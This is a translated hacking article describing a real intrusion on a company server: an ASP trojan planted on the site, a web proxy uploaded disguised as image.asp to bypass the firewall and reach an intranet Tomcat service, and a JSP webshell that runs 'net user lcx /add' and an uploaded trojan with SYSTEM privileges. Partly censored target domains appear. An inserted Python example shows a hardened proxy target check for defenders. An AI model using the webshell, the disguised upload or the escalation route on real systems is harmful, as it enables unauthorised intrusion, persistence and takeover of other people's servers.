Using a script proxy to escalate privileges

By: Lcx

Many people may not be familiar with the idea of a web script proxy. A web script proxy is a dynamic script (ASP, PHP and the like) placed on a server; you call that script and it fetches some other website on your behalf, so the site you reach sees the server's IP address as the visitor rather than yours. 4ngel's PhpSpy backdoor and Marcos's aspadmin webmaster assistant both integrate this function. Both the PHP and the ASP proxies work the same way: the webshell's server fetches the remote site's data (the ASP version through the XMLHTTP component) and relays the content back to you. Many programmers use the same principle to write "thief" programs that pull in another site's data with only a few script files on their own site. If we turn it to attack, what can it do? I have used it for one thing: escalating privileges and getting into the intranet.

1. Privilege Escalation

This may be a special case, but I did run into it. I had placed a Haiyang Top ASP trojan on a compromised website. The site runs on a company's own dedicated server, so the directory permissions are not as locked down as on a typical shared host: almost every directory is writable, and WScript.Shell and other components can be used. But precisely because it is a company's dedicated server, none of the software that makes escalation easy (Serv-U and the like) was installed, there was no other third-party service, and system patches were applied promptly, so escalation was still difficult. Replacing a service is feasible, but it means waiting. After careful examination I found some useful information. The server is a web server running IIS + ASP + Access; it has a firewall and exposes only port 80 to the outside. In addition, an Apache + Tomcat + JSP internal web system is installed with port 8080 open, and the physical directory of that internal web system was found to be C:\ApacheGroup\Tomcat 5.0\server\webapps; I recognised this from my own experience installing Apache + Tomcat + JSP. Running netstat -an from the Haiyang Top shell and viewing the service list and directory information in the ASP trojan confirms these three points (Figures 1, 2 and 3). In addition, ipconfig /all shows clearly that the intranet IP address 10.0.16.16 (Figure 1) is indeed the server's own intranet address.

[Figure 1: image not preserved]

[Figure 2: image not preserved]

[Figure 3: image not preserved]

With this information, the route to escalation also appeared. If I could get past the firewall and reach its intranet web system at http://10.0.16.16:8080 directly, I could first use the Haiyang Top ASP trojan to upload a JSP webshell into that system's physical directory, C:\ApacheGroup\Tomcat 5.0\server\webapps, and then call the JSP webshell. Its Tomcat is installed as a service, and a JSP generally inherits the service's SYSTEM privileges. I started simply, using the htran.exe tool to forward its port 8080 out to the Internet. Would that just work? The result was disappointing: the port was forwarded, but I still could not reach the JSP system, and I did not know why. After some thought it occurred to me: what about dropping an ASP script proxy on its website and calling that proxy to reach the intranet JSP system? Its intranet web and its Internet web sit on the same server, so reaching the one through a script proxy on the other and bypassing the firewall should be no problem, because to the intranet web system the request appears to come from the same machine. I had Marcos's WebProxy.asp on hand, which acts as exactly such a proxy. I renamed it image.asp and uploaded it into a directory of the Internet-facing ASP site. Let us look at the effect: requesting http://www.g***.com/uploadimages/image.asp?url=http://www.haiyang.net/saf... gives Figure 4. My visiting IP has indeed become that of www.g***.com, the server's IP address.
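As an added example (not code from the article, and not Marcos's WebProxy.asp), here is the same kind of proxy written in Python rather than ASP, first in the unchecked form the article relies on, then with the target check a defender would put in front of it. The host names, the DNS table and the function names are assumptions for the demonstration; the resolver is injected so the check runs offline.

```python
"""Added example, not part of the original article or of Marcos's WebProxy.asp.

The article's proxy takes a ``url`` parameter and fetches it from the web
server, so whoever can call the script can reach anything the server can
reach, including an intranet service such as http://10.0.16.16:8080/. The
functions below show that weak form next to the target check a defender would
add. Python stands in for the original ASP; the resolver is injected so the
check runs offline against a constructed DNS table.
"""
import ipaddress
import socket
from urllib.parse import urlsplit
from urllib.request import urlopen

# Constructed sample DNS table (not real records) used in place of a live
# resolver so the example runs offline.
SAMPLE_DNS = {
    "intranet.example": "10.0.16.16",     # a name pointing into the intranet
    "www.example.com": "93.184.216.34",   # an ordinary public host
}


def sample_resolver(host):
    """Look ``host`` up in SAMPLE_DNS, failing the way gethostbyname would."""
    try:
        return SAMPLE_DNS[host]
    except KeyError:
        raise socket.gaierror("no such host: %s" % host)


def proxy_fetch_unchecked(url, timeout=10):
    """The article's proxy at its weakest: fetch whatever the caller names.

    The request leaves from the web server, so a firewall that admits only
    port 80 from outside does nothing to stop it reaching 10.0.16.16:8080.
    """
    with urlopen(url, timeout=timeout) as resp:
        return resp.read()


def is_internal_address(ip):
    """True for addresses a public-facing proxy must never be pointed at:
    loopback, RFC 1918 and other private ranges, link-local (which includes
    the 169.254.169.254 metadata address), multicast, unspecified, reserved."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_unspecified or addr.is_reserved)


def check_proxy_target(url, resolver=socket.gethostbyname, allowed_hosts=None):
    """Decide whether the proxy may fetch ``url``; returns (ok, reason).

    Rejects anything that is not http(s), has no host, falls outside an
    optional hostname allowlist, or names or resolves to an internal address,
    so both ``http://10.0.16.16:8080/`` and a DNS name for it are refused.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname          # already lower-cased, IPv6 brackets stripped
    if not host:
        return False, "no host in url"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, "host %s not in allowlist" % host
    try:
        addr = ipaddress.ip_address(host)       # literal IPv4/IPv6 address
    except ValueError:
        try:
            addr = ipaddress.ip_address(resolver(host))
        except (OSError, ValueError) as exc:    # socket.gaierror is an OSError
            return False, "cannot resolve %s: %s" % (host, exc)
    if is_internal_address(str(addr)):
        return False, "target %s is an internal address" % addr
    return True, "ok"


def proxy_fetch_checked(url, resolver=socket.gethostbyname, allowed_hosts=None,
                        timeout=10):
    """Hardened fetch: refuse before connecting if the target fails the check.

    Two gaps are deliberately left visible: ``urlopen`` resolves the name a
    second time (a rebinding DNS record could answer differently), and it
    follows redirects, which could land on an internal host. Connecting to the
    checked IP with an explicit Host header, and refusing redirects, closes both.
    """
    ok, reason = check_proxy_target(url, resolver, allowed_hosts)
    if not ok:
        raise PermissionError("refusing to proxy %s: %s" % (url, reason))
    return proxy_fetch_unchecked(url, timeout)


if __name__ == "__main__":
    for target in ("http://10.0.16.16:8080/manager/tlist.jsp",
                   "http://intranet.example/",
                   "http://[::1]:8080/",
                   "file:///etc/passwd",
                   "http://www.example.com/"):
        print(target, "->", check_proxy_target(target, sample_resolver))
```

The check runs on the resolved address, not just on the text of the URL, which is what makes the intranet name and the literal 10.0.16.16 equally fail; a proxy that only inspects the string is trivially bypassed by a hostname that resolves inward.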

[Figure 4: image not preserved]

The target, www.haiyang.net/safety/ip...., is a small program I wrote to show the visitor's IP address and port. The code is very simple: it prints the requester's address, source port and any X-Forwarded-For header (the ASP expressions are restored around the labels that remain):

IP -> <%= Request.ServerVariables("REMOTE_ADDR") %><br>
port -> <%= Request.ServerVariables("REMOTE_PORT") %><br>
Actfor -> <%= Request.ServerVariables("HTTP_X_FORWARDED_FOR") %>



All right, the script proxy works. Now write a JSP webshell and upload it into the physical directory of the intranet JSP web system. The webshell is a small script, tlist.jsp, that runs a command and adds a user. The code (its body restored around the import line and the cmd string quoted below) is:

<%@ page import="java.io.*,java.util.*,java.net.*" %>
<%
// The command to run; this is the only line to edit for a different program
String cmd = "cmd.exe /c net user lcx /add";
Process child = Runtime.getRuntime().exec(cmd);
// Relay the command's standard output into the HTTP response
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
    out.print((char) c);
}
in.close();
%>


Some may ask why I did not use one of the ready-made JSP trojans. I tried at first, but this WebProxy.asp can only take a URL directly after it; POST data and other parameters after the URL do not get through. The ready-made JSP trojans are rather complex and have many functions, so some of their commands inevitably need parameters. I uploaded this tlist.jsp to the physical directory of the intranet web and then simply requested http://www.generalichina.com/uploadimages/image.asp?url=http://10.0.16.16:8080/manager/tlist.jsp, and the user lcx was added to the server! To run a trojan instead, just edit the line String cmd = "cmd.exe /c net user lcx /add"; in the JSP. For instance, I uploaded tlist.exe to the server's system directory and changed the line to String cmd = "tlist.exe";, then requested http://www.generalichina.c...url=http://10.0.16.16:8080/manager/tlist.jsp; the result is shown in Figure 5.

[Figure 5: image not preserved]

In practice, note that if you use tlist.jsp to run one command and then edit it to run a different program, you must rename tlist.jsp, or the result of the previous execution is shown again (a caching layer is the likely cause, either Tomcat still serving the servlet compiled from the old file or the XMLHTTP component in the proxy returning a cached response; a new file name changes the URL and defeats both). Also, whether because this server is special or for some other reason, when I put the trojan in a non-system directory such as c:\muma.exe and changed String cmd = "cmd.exe /c net user lcx /add"; to String cmd = "c:\\muma.exe"; (backslash doubled as Java requires), the trojan did not run; it ran successfully only from the system directory, system32. I am not clear why.

2. Intrusion into the intranet and other uses

Intruding into the intranet. From the first example it is clear that if the machine's intranet web were on another machine, the method would be the same as for escalation, though less convenient than when the intranet and Internet sites are on the same host. This is one way for scripts to get into an intranet; its practical value is not great, but it is better than nothing. What other uses are there? If you are on a school network that can reach only the internal network and the school's web server, while the school's web server also reaches the Internet, then put WebProxy.asp or some other script proxy on that web server: requesting http://<school web server>/WebProxy.asp?url=http://www.163.net/index.html from the intranet gets you onto the Internet. Would one ASP script have solved many students' past troubles?
